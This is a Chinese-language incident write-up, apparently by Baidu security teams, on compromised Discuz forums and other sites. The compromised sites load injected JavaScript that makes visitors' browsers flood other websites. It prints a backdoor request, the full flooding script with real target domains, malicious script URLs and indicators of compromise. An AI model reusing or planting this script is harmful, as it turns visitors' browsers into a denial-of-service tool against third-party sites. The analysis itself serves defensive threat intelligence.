原文地址:http://drops.wooyun.org/papers/10656

Author: 百度云安全天網團隊 百度安全攻防實驗室 百度云安全云端防護團隊

0x00 異常挖掘與回溯

11月13日，百度云安全天網系統，通過數十TB的日志挖掘，發現了安全寶某重點客戶網站上的異常行為。之后我們的分析人員跟進，發現這是一起針對安全寶某重點客戶的持續攻擊。最終在客戶系統上放置了Web后門。

該Web后門的通信如下：

POST /uc_server/data/logs/20140708.php?v=1a HTTP/1.1
Host: bbs.xxxxx.com
Referer: http://bbs.xxxxx.com/uc_server/data/logs/20140708.php?v=1a
User-Agent: Sogou
Content-Length: 60

從通信流量上看，并未觸發任何報警。同時，客戶的日志里也并未保存http response的數據。

天網系統中的諦聽模塊通過對網站的訪問行為進行建模，通過每個被防護的網站日志訓練出這個網站特有的訪問模型。包括網站參數的模型，網站訪問路徑的模型，網站訪問session的模型。黑客這次的訪問行為觸發了網站訪問路徑模型的異常。該模型中通過每個路徑訪問的頻度廣度和路徑之間的訪問關系等feature，訓練出針對每個網站特定的路徑視圖。

我們在系統中對該客戶的所有歷史日志進行了回溯，發現該黑客在9月24日就已經對該客戶展開了嘗試性的攻擊。

通過進一步的分析，我們發現，該攻擊者修改了Discuz系統的class_core.php。在該class_core.php中添加的代碼如下：

從該代碼中，我們可以做出以下結論：

1. 這次攻擊不是小范圍的針對單個站點的攻擊，而是攻擊了多個站點
2. 該代碼中并未指定特定的CC攻擊的目標，而是通過Location統一跳轉到http://file.lbgoo.com/file_120/37/ver.php，由該url指定最終的攻擊目標。

0x01 影響確認和攻擊代碼

我們從CC的攻擊代碼中提取了以下特征fuwuqibeiheikeruqin，在現有的網頁情報庫中搜索，發現以下的鏈接地址：

http://www.eoeandroid.com/forum.php?wangzhanbeihei&fuwuqibeiheikeruqin&qinggenghuanfuwuqi&chongzhuangwangzhan

判斷eoeandroid也被這樣攻擊過。

11月20日，http://file.lbgoo.com/file_120/37/ver.php請求被重定向到http://www.eoeandroid.com/forum.php?，11月20日發現eoeandroid已經503了。該攻擊手法被進一步確認。

我們又對該代碼中提及到的php100.com,www.dm123.cn和12edu.com進行訪問。發現如下：

以dm123.cn為例：

顯然該網站被利用來做CC攻擊。

同時我們針對以上網站掛CC攻擊的js進行了分析，發現有三種:

1. dm123.cn中，直接在dm123網站上掛js，腳本路徑如下:
   http://www.dm123.cn/gd.js
2. php100.com中，托管在SAE上的攻擊腳本，腳本路徑如下:
   http://jsddos.sinaapp.com/ddos.js
3. 12edu.com中，通過api接口動態獲得要攻擊的網站，更加難以定位:
   http://www.12edu.com/api.php?op=count&id=34380&modelid=1

以上三種方式，從掃描器檢測的角度來看，復雜度逐漸增大。第一種情況下，是直接檢測本域下的js。第二種則需要檢測外鏈js，檢測量大大增大了。而第三種則是在已有的js里面沒有攻擊代碼。攻擊的代碼是通過api接口動態獲得的。

攻擊用的js代碼如下：

#!js
function imgflyygffgdsddfgd() {
var TARGET = 'www.hanyouwang.com'
var URI = '/index.php?wangzhanbeihei&fuwuqibeiheikeruqin&qinggenghuanfuwuqi&chongzhuangwangzhan&'
var pic = new Image()
var rand = Math.floor(Math.random() * 1000)
pic.src = 'http://'+TARGET+URI+rand+'=val'
}
setInterval(imgflyygffgdsddfgd, 0.1)
function imgflyygffhghddfgd() {
var TARGET = 'www.weshequ.com'
var URI = '/Search/v-wangzhanbeihei&fuwuqibeiheikeruqin&qinggenghuanfuwuqi&chongzhuangwangzhan&'
var pic = new Image()
var rand = Math.floor(Math.random() * 1000)
pic.src = 'http://'+TARGET+URI+rand+'=val'
}
setInterval(imgflyygffhghddfgd, 0.1)

被攻擊域名包括重要政府網站和國家級新聞媒體

0x02 身份確認

通過域名的相似度，我們在現有的網頁情報庫中發現了如下域名：

• 博客：http://jsddos.blog.163.com/
• 論壇：http://www.jsddos.com/

在163博客上可以看到，該團隊名 ddos Js團隊，QQ 1551227222

在網頁情報庫中查找該QQ，可以發現http://www.mspycn.com/about.html

看來除了賣ddos的服務，還在賣手機監聽軟件的服務

對該域名的whois進行查詢，如下：

從我們發現該攻擊到發稿前，該黑客做了如下的事情:

1. 修改了http://file.lbgoo.com/file_120/37/ver.php的指向
2. Php100.com已經不再受影響

0x03 后續

我們有理由相信，這是一個在不斷進化的地下黑客團體。通過更加隱蔽的手法進行CC攻擊掛馬。該問題的影響范圍目前我們還在進一步確認。歡迎業內同仁繼續跟進分析。

如果你想查看自己的網站是否受影響，有兩個步驟：

1. 打開網站，隨機訪問幾個頁面，查看下面是否會發起連續的對其他網站的請求
2. 查看是否會發起請求：http://file.lbgoo.com/file_120/37/ver.php

我們從該攻擊中提取了以下信息作為攻擊情報或者IOC：

http://file.lbgoo.com/file_120/37/ver.php